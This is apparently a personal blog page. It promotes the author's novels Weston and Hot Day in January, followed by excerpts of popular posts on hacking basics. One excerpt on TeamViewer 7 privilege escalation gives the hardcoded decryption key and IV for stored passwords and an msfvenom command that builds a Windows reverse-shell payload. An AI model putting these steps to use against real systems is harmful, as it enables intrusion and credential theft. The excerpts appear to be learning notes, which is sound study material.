Skip to main content

My Books

 

Fan of my writing? Check out my books!




Mouse is a teenage boy living in Weston, one of Toronto's most notorious neighbourhoods. Every day is a struggle as he tries his best to make enough money selling marijuana to support his mother, who is recently single after his father's death. However, after being betrayed by his friend and dropped by his drug dealer, Mouse must find a new supplier and make new connections if he wants to survive, let alone make it to the top of the game.

Weston tells a tale that usually doesn’t get the chance to be told– and that is the unforgettable tale of the hood. Raw, real and riveting, the story must be told.

~



Most twenty-somethings fantasize about falling in love, attaining that dream career and then owning a house. All January Angel wants to do is die.

Hot Day in January chronicles a year in the life of 27-year-old January, an unemployed aspiring punk musician and recreational substance-abuser barely living in Toronto, Canada. When January finds herself evicted from yet another ramshackle apartment, she moves into her friend’s even more dilapidated place, spending her days dumpster diving for food and sleeping on a lumpy futon in the corner of a cigarette-infested room. But it’s okay because January has a plan: she’ll join the likes of Kurt Cobain and Amy Winehouse in the infamous 27 Club and die a famous musician by her next birthday. But with a penchant for dropping acid and taking off with strangers, how will this self-destructive nobody become a somebody?

Teaming up to form a band with her misfit friends, January soon finds herself swept up into the wild world of rock and roll as she struggles to learn the guitar and become a rock star in time to join the infamous club. Along the way, she finds herself in hilarious misadventures such as living illegally in America with a Kurt Cobain wannabe and engaging in terribly awkward exotic dancing. All things considered, her hectic and humorous escapades into the music world will force her to grapple with her future and question just how far she’s willing to go to be famous.


Comments

Popular posts from this blog

The Basics: Telnet, FTP and SMB

This post explains three very basic things you should know about hacking. Those are Telnet, FTP, and SMB. Telnet is a client-server protocol used to test connectivity between machines and issue commands. This is very easy way to gain access to a remote computer. This is almost never installed on production machines anymore FTP (File Transfer Protocol) and SMB (Server Message Block) are tools used to store and access files. If these are installed, you can use commands associated with each tool to view files on the remote computer. Sometimes, these contain valuable information that you can use to elevate access. Telnet $  telnet <IP> <PORT> That's all there is to it :)  FTP $  ftp <IP> <PORT> - port is usually 21 - Check if ftp supports anonymous login (username: anonymous, no password) -use ls to list files, "get" to copy files to your local machine   If you get the message: 200 PORT command successful. Consider using PASV. 425 F

TeamViewer 7 Privilege Escalation

Hello! Today was a good day. I learned how to exploit a privesc vulnerability in TeamViewer (version 7) which had eluded me for quite some time due to a lack of user-friendly resources available online. But today I am changing all that ;) So basically, TeamViewer 7 stores user passwords encrypted with AES-128-CBC with a key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. This means that someone can decrypt that password using that key and iv and use it elsewhere if the user in question made repeated use of their password (as users often do!) Now, the process is doing this manually is complicated but luckily for us, a Metasploit module exists to automate this for us! First. generate a payload with msfvenom like so: $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip attacker> LPORT=4444 -f exe > revshell.exe Then move the payload to the machine with PowerShell (remember to move to the file to the

How To Run TOR as a Non-Root User

Hello Friends, Today I finally figured out something that had eluded for quite a while, and that is... the mysterious process of running TOR as a non-root user! Like many other novice hackers, I had tried to run TOR by adding a user in Kali Linux through the following CLI commands: $ useradd guest $ passwd guest $ runuser -l guest -c ./start-tor-browser.desktop Which gave me the lovely error message below: $ Tor Browser must be run within the X Window System This last output one gives us a clue: the X Window System is graphical interface, which means that we need to run this software outside the CLI (you can try downloading the xorg, but that proved to be much of a headache). To do this, go here: Log out as root and login as the user you created. The computer will load the GUI and you will now be able to run TOR as a non-root user! Please let me know if this tutorial helped you out! xoxo